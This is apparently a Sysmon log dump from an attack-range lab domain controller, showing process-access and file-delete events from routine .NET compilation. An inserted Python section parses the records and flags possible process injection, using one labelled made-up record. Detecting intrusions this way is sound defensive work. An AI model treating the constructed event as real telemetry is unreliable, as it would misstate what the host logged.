21:07:04.418{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A278-60D3-6A05-00000000CF01}6468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTT211RLWR\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dll.auxMD5=F8BFB47FC8232D4954D3DBB6DC6E5904,SHA256=0DF6A3E4A66B367FBFE4D696BB0F4209811CEA00929A224CE0446CC249518D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A278-60D3-6A05-00000000CF01}6468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTT211RLWR\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dllMD5=FFB4B30E41F982885FC264B305BC2592,SHA256=A812532E90560DF8E3A122EBB0F26D47E9293CB2F6BC16233F22AC56CE3235F7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.355{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.339{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-A278-60D3-6905-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6T9635YZ29\Microsoft.SecureBoot.Commands.ni.dll.auxMD5=4ADFDC91CE65FA1ACF5F8D1D0586B949,SHA256=80972BDAD07D08EF82D48B17CC0682F4659CBB052DE759EEB39F03B4A054EB0D,IMPHASH=00000000000000000000000000000000falsetrue 
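The records on this page are Sysmon event XML with the tags stripped, so every field runs into the next: EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer, then the EventData in schema order (RuleName, UtcTime, and the type-specific fields). The Python below is an added example, not part of this dataset or of Sysmon, that splits such a dump back into records, decodes Event ID 10 (ProcessAccess, schema version 3) and Event ID 23 (FileDelete, version 5) by their fixed field order, and then triages the process-access events: it keeps only those whose GrantedAccess mask includes the rights an injector needs and whose call trace has a frame that is not backed by a module under C:\Windows. Three of the four sample records are copied verbatim from this page; the fourth (record 99999, C:\Users\Public\tool.exe with an UNKNOWN frame) is constructed for the example and does not appear on the page.

```python
import re

# Three records copied verbatim from this page (Event ID 10 and 23, host win-dc-663).
# The FOURTH record (99999, C:\Users\Public\tool.exe) is CONSTRUCTED and not on the page.
# As on the page, tags are stripped and one record is wrapped mid-token ("Micro" / "soft.NET").
SAMPLE = r"""10341000x800000000000000023064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A278-60D3-7005-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GTBIDSZZBE\Microsoft.Security.Powershell.Cmdlets.ni.dllMD5=90E849D0E8E803F9558128E316131F46,SHA256=5AF90E76D0A9DDB2BD52E7D0E61F141A8C068112FE462DA5F30CC553A0B8D0B5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000099999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.000{4DB9351A-FFFF-60D3-FFFF-00000000CF01}77767780C:\Users\Public\tool.exe{4DB9351A-9DDD-60D3-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(000001F0A4B20000)"""

# System fields: EventID Version Level Task Opcode Keywords EventRecordID Channel Computer,
# then EventData begins with RuleName ("-" or "DLL" on this page) and UtcTime.
HEADER_RE = re.compile(
    r"^(?P<event_id>\d{1,2})(?P<version>\d)(?P<level>\d)(?P<task>\d{1,2})(?P<opcode>\d)"
    r"(?P<keywords>0x[0-9a-f]{16})(?P<record_id>\d+)"
    r"(?P<channel>Microsoft-Windows-Sysmon/Operational)"
    r"(?P<computer>[\w.-]+?)(?P<rule>-|DLL)"
    r"(?P<utc>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})(?P<body>.*)$"
)
# Event 10 v3: SourceProcessGUID, SourceProcessId+SourceThreadId (fused by the extraction,
# kept as one string), SourceImage, TargetProcessGUID, TargetProcessId, TargetImage,
# GrantedAccess, CallTrace.
PROCESS_ACCESS_RE = re.compile(
    r"^\{(?P<src_guid>[0-9A-F-]{36})\}(?P<src_pid_tid>\d+)(?P<src_image>[A-Za-z]:\\.+?\.exe)"
    r"\{(?P<tgt_guid>[0-9A-F-]{36})\}(?P<tgt_pid>\d+)(?P<tgt_image>[A-Za-z]:\\.+?\.exe)"
    r"(?P<granted>0x[0-9a-f]+?)(?P<calltrace>(?:[A-Za-z]:\\|UNKNOWN).*)$"
)
# Event 23 v5: ProcessGuid, ProcessId, User, Image, TargetFilename, Hashes, IsExecutable, Archived.
FILE_DELETE_RE = re.compile(
    r"^\{(?P<guid>[0-9A-F-]{36})\}(?P<pid>\d+)(?P<user>.+?)(?P<image>[A-Za-z]:\\.+?\.exe)"
    r"(?P<target>[A-Za-z]:\\.+?)MD5=(?P<md5>[0-9A-F]{32}),SHA256=(?P<sha256>[0-9A-F]{64}),"
    r"IMPHASH=(?P<imphash>[0-9A-F]{32})(?P<is_executable>true|false)(?P<archived>true|false)$"
)
# Records are separated only by whitespace immediately before the next header.
RECORD_SPLIT_RE = re.compile(
    r"\s+(?=\d{5,7}0x8000000000000000\d+Microsoft-Windows-Sysmon/Operational)"
)

# Process access rights (winnt.h) that an injector needs in its handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def split_records(text):
    """Undo the extraction's line wraps, then cut the dump at each record header."""
    joined = text.replace("\n", "")
    return [r.strip() for r in RECORD_SPLIT_RE.split(joined) if r.strip()]


def parse_record(record):
    """Decode one tag-stripped record into a dict, or None if it is not a Sysmon record."""
    m = HEADER_RE.match(record)
    if not m or m["event_id"] != m["task"]:  # Sysmon always sets Task == EventID
        return None
    ev = {k: m[k] for k in ("channel", "computer", "rule", "utc")}
    ev["event_id"] = int(m["event_id"])
    ev["record_id"] = int(m["record_id"])
    decoder = {10: PROCESS_ACCESS_RE, 23: FILE_DELETE_RE}.get(ev["event_id"])
    b = decoder.match(m["body"]) if decoder else None
    if b is None:
        ev["body"] = m["body"]  # other event types are left undecoded here
        return ev
    ev.update(b.groupdict())
    if ev["event_id"] == 10:
        ev["granted"] = int(b["granted"], 16)
        ev["calltrace"] = b["calltrace"].split("|")
    else:
        ev["is_executable"] = b["is_executable"] == "true"
        ev["archived"] = b["archived"] == "true"
    return ev


def is_windows_module(frame):
    """True when a call-trace frame ('module+offset') is backed by a file under C:\\Windows."""
    return frame.split("+", 1)[0].lower().startswith("c:\\windows\\")


def suspicious_process_access(events):
    """Event 10 records whose mask allows injection AND whose call trace leaves C:\\Windows."""
    hits = []
    for ev in events:
        if ev is None or ev["event_id"] != 10 or "granted" not in ev:
            continue
        if not ev["granted"] & INJECTION_RIGHTS:
            continue
        foreign = [f for f in ev["calltrace"] if not is_windows_module(f)]
        if foreign:
            hits.append((ev["record_id"], ev["src_image"], ev["tgt_image"], foreign))
    return hits


if __name__ == "__main__":
    parsed = [parse_record(r) for r in split_records(SAMPLE)]
    for ev in parsed:
        print(ev["record_id"], ev["event_id"], ev.get("src_image") or ev.get("image"))
    for hit in suspicious_process_access(parsed):
        print("SUSPICIOUS:", hit)
```

Two caveats follow from the page's own records. First, every csrss.exe open here is 0x1fffff (PROCESS_ALL_ACCESS) through basesrv.DLL at process start, and every ngen.exe open of mscorsvw.exe comes through mscorsvc.dll, so a rule on the access mask alone would fire on all of them; the call-trace check is what separates that noise from the constructed tool.exe record, and the 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) opens from svchost.exe via rpcss.dll never reach the mask test. Second, the extraction fused SourceProcessId and SourceThreadId into one digit run ("412432", "844876"), which cannot be split mechanically; the parser keeps it as a string, though comparing records on the page shows csrss.exe is PID 412 and svchost.exe is PID 844 with the remaining digits being thread IDs.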
23542300x800000000000000023031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-A278-60D3-6905-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6T9635YZ29\Microsoft.SecureBoot.Commands.ni.dllMD5=71D18AB66C5A360415E66D27045560CA,SHA256=CCEAB97AEFDE3B36A39470D9EC532D67A43FDD200EE205331E3E82B7747F77F3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.308{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.277{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-A278-60D3-6805-00000000CF01}3492NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8JLYFCKCRW\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.ni.dll.auxMD5=C0E5E6BBF2DFFB16FBFE023C077A9A5A,SHA256=A67D671AB222D3A02198D8A807FFF5FBF8F87DAD31562901FFE195E3E5EF73F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-A278-60D3-6805-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8JLYFCKCRW\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.ni.dllMD5=8D976435E8D16643EB1A9C5EF5B33ECF,SHA256=F18602583152B5B2E7F0244FCF2DA74C0C4091014427E978277AE7C3648F9404,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07E643ED02999EFD3B30C4984D9F6A1,SHA256=5AED4D23493F0C74DEF401FE6B978274F9F36591703D4433C9608776315DA714,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.183{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.136{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:04.136{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.121{4DB9351A-A277-60D3-6705-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U2S8M7QW5M\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll.auxMD5=56A136023721FA12E0CC2CB47EAAA5D5,SHA256=B421DAD35CF4247E3DB19675FBFF8DCC7FE03D3C5EA24224802E313665DA94B9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.121{4DB9351A-A277-60D3-6705-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U2S8M7QW5M\Microsoft.PowerShell.Workflow.ServiceCore.ni.dllMD5=B082C8986B141770DCBFA7C9143D4666,SHA256=E6172B46AD5EE40DB330EE12D7082A2B619C6052E23AD54E458564D397FEAB63,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 